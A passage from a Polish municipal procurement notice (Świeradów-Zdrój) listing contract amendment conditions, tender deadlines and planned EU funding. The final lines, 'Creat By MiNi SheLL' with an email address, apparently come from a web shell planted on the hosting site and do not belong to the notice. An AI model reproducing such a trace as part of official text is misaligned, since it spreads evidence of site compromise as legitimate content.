nie wymienionych w treści umowy, ł) zmiana danych związanych z obsługą administracyjną umowy np. zmiana rachunku bankowego, m) wystąpiła konieczność wykonywania usługi, która stanowi niezbędny element zamówienia nieprzewidziany w umowie, wówczas Wykonawca będzie zobowiązany niezwłocznie zawiadomić o tym fakcie Zamawiającego w celu wszczęcia procedur wymaganych przez Prawo zamówień publicznych. W tym przypadku istnieje możliwość przesunięcia terminu wykonania przedmiotu umowy o okres niezbędny do wykonania zamówienia dodatkowego. Termin wykonania zamówienia (umowy) ulega wydłużeniu o czas równy trwaniu przerw w wykonywaniu zamówienia, n) z powodu uzasadnionych zamian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zmawiającego, o) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron. p) pomimo wystąpienia Wykonawcy o wydanie opinii administracyjnej lub innego dokumentu niezbędnego do prawidłowej realizacji przedmiotu umowy, w terminie 1 miesiąca od daty wystąpienia organ administracji publicznej lub inna instytucja nie wydała stosownego dokumentu, mimo iż wystąpienie Wykonawcy spełniło wszystkie warunki formalne. 3. Wszystkie powyżej opisane w ust. 2 okoliczności stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej umowy w formie aneksu do umowy jest zgoda obu stron wyrażona na piśmie, pod rygorem nieważności zmian. 4. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien poinformować Zamawiającego niezwłocznie, tj. w terminie 3 dni roboczych od wystąpienia tych okoliczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.umswieradowzdroj.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świeradów-Zdrój ul. 11-go Listopada 35 Świeradów-Zdrój pokój nr 21a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2016 godzina 14:00, miejsce: Urząd Miasta Świeradów-Zdrój ul. 11-go Listopada 35 Świeradów-Zdrój sekretariat pokój nr 1d.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający zamierza się ubiegać o dofinansowanie projektu ze środków Unii Europejskiej w ramach środków RPO WD 2014-2020, działanie 4.2 Gospodarka wodno-ściekowa oraz PROW 2014-2020, działanie Podstawowe usługi dla gospodarki i ludności wiejskiej Program Rozwoju Obszarów Wiejskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com